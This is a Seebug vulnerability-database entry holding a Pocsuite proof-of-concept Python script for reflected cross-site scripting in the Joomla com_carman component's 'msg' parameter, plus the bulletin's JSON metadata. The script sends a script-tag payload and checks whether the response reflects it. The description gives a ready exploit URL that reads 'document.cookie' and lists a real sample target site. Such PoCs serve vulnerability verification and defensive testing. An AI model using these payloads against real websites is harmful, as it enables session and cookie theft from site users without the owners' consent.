ID SSV:18676
Type seebug
Reporter Root
Modified 2009-12-24T00:00:00
Description
No description provided by source.
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
    """Pocsuite check for reflected XSS in the Joomla com_carman ``msg`` parameter.

    Both entry points issue the same single GET request: ``_attack`` simply
    delegates to ``_verify``. A positive result means the value of ``msg``
    came back in the response body without HTML output encoding, which is
    what the component would need to apply to close the issue.
    """

    # --- Bulletin metadata read by the framework -------------------------
    vulID = '18676'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-12-24'
    createDate = '2016-01-21'
    updateDate = '2016-01-21'
    references = ['http://www.sebug.net/vuldb/ssvid-18676']
    name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla!'
    appVersion = 'N/A'
    vulType = 'XSS'
    # Free-text description kept in the author's original language (runtime
    # string). It says the `msg` parameter is insufficiently filtered, gives
    # the request format, and links two screenshots.
    desc = '''
    Joomla组件com_carman由于参数msg过滤不严格,导致出现反射性XSS漏洞。
    该漏洞利用的POC格式如下:
    http://XXX/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>
    该漏洞在Firefox浏览器下利用与验证的效果截图如下所示:
    (1)http://pan.baidu.com/s/1c0OnfWk
    (2)http://pan.baidu.com/s/1skl3ifb
    '''
    # Sample host recorded by the PoC author.
    samples = ['http://carrentalsltd.com']

    def _attack(self):
        """Run attack mode, which here is identical to verification."""
        return self._verify()

    def _verify(self):
        """Request the component with a marker payload and test for reflection.

        Returns the ``Output`` object built by ``parse_output``. The result
        dict carries a ``VerifyInfo`` entry only when the response status is
        200 and the script tag appears verbatim in the body.

        NOTE(review): this is a reflection test only. It does not look at the
        response media type or at where in the document the value lands, so a
        verbatim echo in a non-HTML response would also count as a hit.
        """
        # Distinctive marker so a match is not caused by ordinary page text.
        marker = "<0x!Q_az*^~>"
        # Only the script tag is searched for in the response; the payload
        # sent on the wire is the same tag preceded by `">`.
        script_tag = '<script>alert(/' + marker + '/)</script>'
        payload = '">' + script_tag

        # Path and query string of the component, ending at the `msg` value.
        endpoint = '/index.php?option=com_carman&msg='

        # Browser-like request headers. Content-Type is sent although this is
        # a GET without a body; it is kept exactly as the original had it.
        request_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive',
            "Content-Type": "application/x-www-form-urlencoded"
        }

        # timeout=50 is presumably in seconds, as in requests -- TODO confirm
        # against pocsuite.net.req.
        response = req.get(
            url=self.url + endpoint + payload,
            headers=request_headers,
            timeout=50,
        )

        findings = {}
        # Short-circuit keeps the body check off non-200 responses.
        reflected = response.status_code == 200 and script_tag in response.content
        if reflected:
            findings['VerifyInfo'] = {
                'URL': self.url + endpoint,
                'Payload': payload,
            }
        return self.parse_output(findings)

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else failure.

        The failure text is reused for every negative outcome, including a
        target that answered normally but did not reflect the marker.
        """
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
        else:
            output.success(result)
        return output
# Pass the PoC class to the `register` helper imported from pocsuite.utils.
register(TestPOC)
{"href": "https://www.seebug.org/vuldb/ssvid-18676", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2009-12-24T00:00:00", "title": "Joomla Component com_carman Cross Site Scripting Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18676", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2009-12-24T00:00:00", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '18676' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2009-12-24'\r\n createDate = '2016-01-21'\r\n updateDate = '2016-01-21'\r\n references = ['http://www.sebug.net/vuldb/ssvid-18676']\r\n name = 'Joomla Component com_carman Cross Site Scripting Vulnerability'\r\n appPowerLink = 'http://www.joomla.org'\r\n appName = 'Joomla!'\r\n appVersion = 'N/A'\r\n vulType = 'XSS'\r\n desc = '''\r\n Joomla\u7ec4\u4ef6com_carman\u7531\u4e8e\u53c2\u6570msg\u8fc7\u6ee4\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u51fa\u73b0\u53cd\u5c04\u6027XSS\u6f0f\u6d1e\u3002\r\n \r\n \u8be5\u6f0f\u6d1e\u5229\u7528\u7684POC\u683c\u5f0f\u5982\u4e0b\uff1a\r\n http://XXX/index.php?option=com_carman&msg=\"><script>alert(document.cookie)</script>\r\n\r\n \u8be5\u6f0f\u6d1e\u5728Firefox\u6d4f\u89c8\u5668\u4e0b\u5229\u7528\u4e0e\u9a8c\u8bc1\u7684\u6548\u679c\u622a\u56fe\u5982\u4e0b\u6240\u793a\uff1a\r\n \uff081\uff09http://pan.baidu.com/s/1c0OnfWk\r\n \uff082\uff09http://pan.baidu.com/s/1skl3ifb\r\n '''\r\n samples = ['http://carrentalsltd.com']\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def _verify(self):\r\n #\u9a8c\u8bc1\u6f0f\u6d1e\r\n result = {}\r\n #\u7279\u5f81\u5b57\u7b26\u4e32\r\n strxss=\"<0x!Q_az*^~>\"\r\n #\u6784\u9020XSS\u9a8c\u8bc1\u7684payload\r\n 
payload='\"><script>alert(/'+strxss+'/)</script>'\r\n #\u6f0f\u6d1e\u8bbf\u95ee\u5730\u5740\r\n exploit='/index.php?option=com_carman&msg='\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive',\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n #\u6784\u9020\u8bbf\u95ee\u5730\u5740\r\n vulurl=self.url+exploit+payload\r\n #\u8bbf\u95ee\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u5224\u65ad\u8fd4\u56de\u7ed3\u679c\r\n if resp.status_code==200 and '<script>alert(/'+strxss+'/)</script>' in resp.content:\r\n #\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f\r\n result['VerifyInfo']={}\r\n result['VerifyInfo']['URL'] =self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "id": "SSV:18676", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T18:20:07", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T18:20:07"}, "dependencies": {"references": [], "modified": "2017-11-19T18:20:07"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "references": []}
{}